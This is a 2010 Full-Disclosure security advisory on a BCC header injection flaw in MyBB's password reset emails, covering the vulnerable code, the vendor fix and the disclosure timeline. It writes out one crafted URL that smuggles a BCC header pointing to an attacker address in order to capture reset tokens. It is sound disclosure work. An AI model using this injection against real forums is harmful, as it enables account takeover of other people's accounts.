[Full-disclosure] Advisory 01/2010: MyBB Password Reset Email BCC: Injection Vulnerability




SektionEins GmbH
www.sektioneins.de

-= Security Advisory =-

Advisory: MyBB Password Reset Email BCC: Injection Vulnerability
Release Date: 2010/04/13
Last Modified: 2010/04/13
Author: Stefan Esser [stefan.esser[at]sektioneins.de]

Application: MyBB <= 1.4.11
Severity: An email injection vulnerability in MyBB allows injecting
e.g. BCC mail headers into password reset emails. This
allows an attacker to takeover accounts via the password
reset functionality.
Risk: Critical
Vendor Status: MyBB 1.4.12 was released which fixes this vulnerability
Reference:
http://www.sektioneins.com/en/advisories/advisory-012010-mybb-password-reset-email-bcc-injection-vulnerability/


Overview:

Quote from http://www.mybboard.net
"MyBB is a discussion board that has been around for a while; it has
evolved from other bulletin boards into the forum package it is
today. Therefore, it is a professional and efficient discussion
board, developed by an active team of developers. The MyBB history
has been recorded and is available for the interested to read.
You can also read more about the MyBB team and why they develop
MyBB in their spare time. We also like to highlight the most
active and contributing fansites of the MyBB community."

During evaluation of various password reset implementations it was
discovered that MyBB contains an email injection vulnerability that
allows arbitrary account takeover by injecting BCC: email headers
through a simple URL manipulation.

When triggering the password reset functionality via such a
manipulated URL MyBB will send a copy of the secret password reset
email to wherever the injected BCC: header points to.

Details:

Inside the set_common_header() method of the MailHandler class the
following code is responsible for adding several common headers to
all outgoing emails. This includes all password reset emails.

$this->headers .= "Message-ID: <{$msg_id}>{$this->delimiter}";
$this->headers .= "Content-Transfer-Encoding: 8bit{$this->delimiter}";
$this->headers .= "X-Priority: 3{$this->delimiter}";
$this->headers .= "X-MSMail-Priority: Normal{$this->delimiter}";
$this->headers .= "X-Mailer: MyBB{$this->delimiter}";
if(defined("IN_ADMINCP"))
{
...
}
$this->headers .= "X-MyBB-Script:
{$http_host}{$_SERVER['PHP_SELF']}{$this->delimiter}";
$this->headers .= "MIME-Version: 1.0{$this->delimiter}";

The code above adds a "X-MyBB-Script" header to all outgoing emails,
which contains the content of the $_SERVER['PHP_SELF'] variable.
The problem here is that PHP_SELF does not only contain the path
relative to the document root directory, but also extensions like
the Apache PATH_INFO. Therefore it is controllable by malicious
users.

By calling a MyBB PHP script like

http://example.com/MyBB/index.php/%0aBCC:attacker@xxxxxxxxxxx%0ax:

it is possible to add arbitrary BCC headers to all emails sent by
this script. If the same attack is used against the password reset
functionality an attacker is able to grab a copy of the secret
password reset token and the randomly generated password, which
results in an account takeover.

This vulnerability was fixed by the vendor by removing the code that
adds the X-MyBB-Script header to the email.

Furthermore it should be noted that users of the Suhosin Extension
version 0.9.30 or newer are safe from this class of attacks because
several unsafe characters like < > " ' \r and \n are automatically
replaced by a ? character within PHP_SELF.

Proof of Concept:

SektionEins GmbH is not going to release a proof of concept
exploit for this vulnerability.

Disclosure Timeline:

31. March 2010 - Notified the MyBB devs via security contact form
13. April 2010 - MyBB developers released MyBB 1.4.12
13. April 2010 - Public Disclosure

Recommendation:

It is recommended to upgrade to the latest version of MyBB.

Grab your copy at:
http://mybboard.net/downloads

CVE Information:

The Common Vulnerabilities and Exposures project (cve.mitre.org) has
not assigned a name to this vulnerability.

Month of PHP Security:

If you have a non-public vulnerability like this one, then don't
hesitate to
submit it to the Month of PHP Security. Further information at

http://php-security.org

GPG-Key:

pub 1024D/15ABDA78 2004-10-17 Stefan Esser
Key fingerprint = 7806 58C8 CFA8 CE4A 1C2C 57DD 4AE1 795E 15AB DA78

Copyright 2010 SektionEins GmbH. All rights reserved.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/